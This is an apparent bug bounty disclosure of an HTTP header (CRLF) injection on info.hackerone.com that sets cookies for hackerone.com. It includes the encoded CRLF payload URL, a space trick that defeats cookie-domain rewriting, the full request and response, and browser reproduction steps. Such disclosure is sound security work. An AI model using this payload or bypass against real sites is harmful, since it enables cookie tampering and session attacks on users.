HTTP header injection in info.hackerone.com allows setting cookies for hackerone.com

The subdomain **info.hackerone.com** is vulnerable to HTTP header injection. I'm aware that you are only interested in critical issues affecting this subdomain. However, you may be interested in this issue as a vulnerability in this domain may affect the domain **hackerone.com**. The vulnerability is a classic HTTP header injection. By making the following HTTP request it's possible to inject additional HTTP headers: ``` GET /%0d%0aset-cookie%20%3amycookie%3dmyvalue;%20%44omain%20%3d.hackerone.com HTTP/1.1 Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36 Accept-Language: en-us,en;q=0.5 Host: info.hackerone.com Cookie: BIGipServerab12web-app_https=688587018.47873.0000; BIGipServerab12web-app_http=621478154.20480.0000; __cfduid=db2a412f6305ca8dcc97a7cf06d1da6271446241668; __cfduid=d50b9d3c96413964ca4674c7ebd24ba581446241674 Accept-Encoding: gzip, deflate ``` This HTTP request will produce the following response: ``` HTTP/1.1 302 Found Date: Mon, 02 Nov 2015 17:40:28 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 265 Connection: keep-alive Cf-Railgun: direct (starting new WAN connection) Location: https://info.hackerone.com/ Set-Cookie: mycookie=myvalue; Domain =.hackerone.com Vary: Accept-Encoding Server: cloudflare-nginx CF-RAY: 23f19fec71ae3494-LHR ``` As you can see a new header `Set-Cookie: mycookie=myvalue; Domain =.hackerone.com` was injected in the response. Notice the extra space after the Domain keyword? That was necessary to bypass some code that was automatically setting the cookie domain to info.hackerone.com. Because subdomains can set cookies for the root domain, info.hackerone.com can set cookies for the main domain hackerone.com. To reproduce, follow the next steps: - Visit the following URL in Internet Explorer. I've reproduced with Internet Explorer 11 (exact version **11.0.9600.17691**) http://info.hackerone.com/%0d%0aset-cookie%20%3amycookie%3dmyvalue;%20%44omain%20%3d.hackerone.com - Check the cookies from the domain hackerone.com by entering Internet Explorer console mode (F12) and the console tag. **document.cookie** **"_ga=GA1.2.1697487504.1446486792; _gat=1; mycookie=myvalue"** A new cookie named **mycookie** with the value **myvalue** was set.